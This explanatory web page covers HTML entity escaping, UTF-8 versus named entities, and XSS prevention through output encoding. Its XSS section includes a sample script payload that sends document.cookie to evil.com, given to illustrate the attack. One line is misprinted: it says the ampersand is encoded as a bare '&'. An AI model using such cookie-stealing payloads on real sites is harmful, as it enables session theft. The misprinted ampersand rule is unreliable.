HTML Entity

The five characters you must always escape in HTML

Five characters have special meaning in HTML and must be encoded as entities when they appear as literal text content or in attribute values.

& (ampersand) must always be encoded as &. An unescaped ampersand can be interpreted as the start of an entity reference, potentially corrupting nearby text or triggering parse errors.

< (less-than) must be encoded as &lt;. An unescaped < is interpreted as the start of an HTML tag, which can break the page layout or, in the worst case, inject script tags — a Cross-Site Scripting (XSS) vulnerability.

> (greater-than) should be encoded as &gt;. While browsers are more tolerant of unescaped > in text content, it is required in some contexts (notably XHTML) and is a good practice universally.

" (double quote) must be encoded as &quot; when appearing inside a double-quoted HTML attribute: <div class="my&quot;class"> would break the attribute. Inside a single-quoted attribute, it is safe unescaped.

' (apostrophe/single quote) should be encoded as &#39; or &apos; when appearing inside a single-quoted attribute. Inside a double-quoted attribute, it is safe. In HTML5 content, it is safe unescaped, but encoding it prevents issues in XML/XHTML.

HTML entities vs Unicode — which to use

Modern HTML pages served with UTF-8 encoding (the universal standard) can include any Unicode character directly in the source — no entity encoding required for accented letters, symbols, or emoji. Characters like é, ©, €, and 😀 can appear literally in UTF-8 HTML and will render correctly in all modern browsers.

Named HTML entities like &copy;, &reg;, &euro;, and &mdash; exist from an era when web pages were not reliably served in a consistent encoding. In the early web, a document might be ASCII, ISO-8859-1, or Windows-1252 depending on the server configuration. Entities provided a way to include characters outside the basic ASCII range reliably, because entities are plain ASCII themselves.

Today, the pragmatic guidance is: always use UTF-8 (declare it with <meta charset="UTF-8"> in the <head>), include the characters you need literally in the source, and only use entities for the five special HTML characters (&, <, >, ", '). Using &copy; instead of © is harmless but unnecessary. Using named entities for every special character makes HTML source harder to read and write.

HTML entity encoding and XSS prevention

Cross-Site Scripting (XSS) is one of the most common and damaging web vulnerabilities. An XSS attack occurs when an attacker injects malicious script code into a page that is then executed in other users' browsers. The most common vector: user-supplied text (names, comments, search queries) is inserted into HTML without encoding.

If a search page displays: <p>Results for: [unescaped user input]</p>, an attacker can search for <script>document.location='https://evil.com?cookie='+document.cookie</script> and steal session cookies from anyone who sees the resulting page. HTML entity encoding the user input — converting < to &lt; and > to &gt; — renders the script as harmless literal text.

The correct defense is output encoding: apply HTML entity encoding at the moment you insert data into an HTML context. Different contexts require different encoding: HTML entity encoding for HTML content, JavaScript string encoding for inline JavaScript, URL percent-encoding for URL parameters. Modern templating engines (React JSX, Jinja2, Handlebars) apply HTML encoding automatically by default — the risk comes from explicitly bypassing the auto-escaping with raw/unsafe/dangerouslySetInnerHTML patterns.